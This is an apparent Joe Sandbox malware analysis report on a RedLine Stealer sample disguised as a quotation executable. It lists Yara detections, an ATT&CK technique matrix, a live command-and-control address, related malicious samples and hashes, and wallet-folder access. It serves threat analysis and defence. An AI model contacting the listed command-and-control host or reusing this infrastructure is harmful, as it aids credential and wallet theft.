Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION#09678.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7564, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION#09678.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7564, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 OS Credential Dumping	341 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION#09678.exe	26%	ReversingLabs
QUOTATION#09678.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://193.70.111.186:13484t-	0%	Avira URL Cloud	safe
http://193.70.111.186:13484	0%	Avira URL Cloud	safe
http://193.70.111.186:13484/	0%	Avira URL Cloud	safe
193.70.111.186:13484	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
193.70.111.186:13484	true	Avira URL Cloud: safe	unknown
http://193.70.111.186:13484/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://193.70.111.186:13484	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
http://tempuri.org/	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.16.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
http://193.70.111.186:13484t-	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002B75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
https://api.ipify.orgcookies//settinString.Removeg	QUOTATION#09678.exe, 00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 0000000B.00000002.1538878419.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1538878419.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, tmp120B.tmp.11.dr, tmp4841.tmp.11.dr, tmp115D.tmp.11.dr, tmp4874.tmp.11.dr, tmp10DF.tmp.11.dr, tmp123C.tmp.11.dr, tmp4862.tmp.11.dr, tmp121C.tmp.11.dr, tmp4873.tmp.11.dr, tmp4852.tmp.11.dr, tmp4885.tmp.11.dr, tmp11FA.tmp.11.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	RegSvcs.exe, 0000000B.00000002.1537172101.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.70.111.186	unknown	France		16276	OVHFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554625
Start date and time:	2024-11-12 18:44:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION#09678.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@11/53@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 108 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31, 20.189.173.21
Excluded domains from analysis (whitelisted): licensing.mp.microsoft.com, api.ip.sb.cdn.cloudflare.net, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: QUOTATION#09678.exe

Simulations

Behavior and APIs

Time	Type	Description
12:45:18	API Interceptor	25x Sleep call for process: powershell.exe modified
14:25:43	API Interceptor	48x Sleep call for process: RegSvcs.exe modified
14:26:03	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.70.111.186	RFQ_TFS-1508-AL NASR ENGINEERING.exe	Get hash	malicious	RedLine	Browse	193.70.111.186:13484/
	QUOTATION#09678.exe	Get hash	malicious	RedLine	Browse	193.70.111.186:13484/
	COTIZACI#U00d3N#09678.exe	Get hash	malicious	RedLine	Browse	193.70.111.186:13484/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	neworigin.exe	Get hash	malicious	AgentTesla	Browse	51.195.88.199
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	https://sharepoint-business.com/?rid=eprRhgr	Get hash	malicious	Unknown	Browse	51.178.43.144
	http://matomo.uk.oxa.cloud	Get hash	malicious	Unknown	Browse	51.195.180.103
	zgp.elf	Get hash	malicious	Mirai	Browse	51.222.237.206
	mNtu4X8ZyE.exe	Get hash	malicious	Emotet	Browse	51.75.33.127
	75A0VTo3z9.exe	Get hash	malicious	Emotet	Browse	46.105.114.137
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceea	Get hash	malicious	HTMLPhisher	Browse	192.99.218.232

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_QUOTATION#09678._219e077cc2e4084a621b5a52d61711c854854a6_79443d72_8a6e0c61-5a37-44a8-8aed-c43c166b3102\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2374019290507179
Encrypted:	false
SSDEEP:	192:NNLOY6LNjLO0UnU1a+z3OlTw7ZF8OEMWdzuiF2+Z24lO8i:J6ZjhUnU1aAoXyCzuiF2+Y4lO8i
MD5:	9BB04EFCA00EE579F381DC517027FE22
SHA1:	0A8C5361396A1D4D9A6ACAC406CE7179F830A7EE
SHA-256:	787C369E7FB22290F0F01F2E4C2E94EA039CFCA5B6F96921085404EFEF23F6AB
SHA-512:	2D40AA716CE4376C314A0E9EE73A7195070B9E09B1CDD3DD97691F9BAF22C19C203E33E75F441C34BF390DC7121ED5CB72BCC320522E97788E03A17EA14C63DB
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.0.7.1.1.7.0.3.5.1.2.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.0.7.1.1.8.5.6.6.3.9.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.6.e.0.c.6.1.-.5.a.3.7.-.4.4.a.8.-.8.a.e.d.-.c.4.3.c.1.6.6.b.3.1.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.4.8.6.f.8.7.-.f.0.e.c.-.4.3.2.d.-.a.f.2.6.-.6.b.2.7.c.7.4.7.a.f.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.Q.U.O.T.A.T.I.O.N.#.0.9.6.7.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.K.o.s.t.a.n.a.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.0.-.0.0.0.1.-.0.0.1.4.-.0.f.3.f.-.6.e.9.9.2.a.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.4.a.a.9.a.f.6.a.2.3.5.3.7.6.b.1.4.8.6.c.5.4.5.b.b.c.f.4.9.2.e.0.0.0.0.0.0.0.0.!.0.0.0.0.f.6.e.f.3.3.b.c.5.6.5.6.e.5.d.e.b.9.2.5.b.2.a.6.7.5.7.4.c.a.6.f.3.2.c.a.5.0.e.3.!.Q.U.O.T.A.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC11.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Tue Nov 12 17:45:18 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	514002
Entropy (8bit):	3.2917796467458325
Encrypted:	false
SSDEEP:	3072:Lk81Q6IlR9UFaz6Blfuf1CCqe2CYM3+vI2zRnGWYz8K4WPmKCDcSwRui:L1vIlRnzHqPM3QIiXYQKXvCXwz
MD5:	F45DE6C86C186434438A6E16FC7D4C5B
SHA1:	75CFC81B7B99C93981D199188A3A90F01126573A
SHA-256:	09364A50741C2BFCCAA1708B59C91CF7C3F8503A55A1F6CA503D65FC057944F2
SHA-512:	6FDEFD538B10C2FC0CED40F04C390F702E1B3E14CF4ECED221CA019DAA9755A33ED7E9A9BDB1C12BC308B39C65D807330918E2A15E63E89866BC0865D9517C9A
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........3g....................................$...P'......D"..t'.......S..............l.......8...........T............9..B............I...........K..............................................................................eJ......<L......Lw......................T.......0.....3g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0D5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9082
Entropy (8bit):	3.715174965830812
Encrypted:	false
SSDEEP:	192:R6l7wVeJLZ3ZeqL6YNLPb1gmfTqrpr389bzAkfM7xm:R6lXJVZeA6YBPb1gmfTqOzDfx
MD5:	F7B2B323AF146F222F925016F739E66E
SHA1:	2EE4129D1ED04CF2DE64DA2DC92C18358B69659D
SHA-256:	857B24B4828454FB745FE2219736C816E4CE0300525F1E3F943D708E1FF016A5
SHA-512:	8211AEE06EABE2CF7D41074AC36DEEB85DFBF0CCB70ECAA091839F7A0D77D7F097B1DA1970238889693A7CD6AFEEC73597DF224D96F698001305B4CDDAC09831
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF114.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4787
Entropy (8bit):	4.553766534114828
Encrypted:	false
SSDEEP:	48:cvIwWl8zs6Jg771I9/0WpW8VYJYm8M4JhQF/AFhyq859d46M0nm0Od:uIjfII74t7VlJhQaeBM0nm0Od
MD5:	4303663D23637596BEF821FB584B61E8
SHA1:	D5F8917C28119A318273AE9C97C4642CBFDB4CA0
SHA-256:	EC327E5F2B4CA2063B0661325FFC8232003504A499832550DD2E4EE206730E85
SHA-512:	C59310B49CC6121B887D9E13C255E7D17E1DDF9951BE61247B1CB0EFC1537E351E2D2E9B8EBE2D18AE70534F3D3B917635B660F546C1D4EB10F853DD204C401C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="585167" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	5.345804351520589
Encrypted:	false
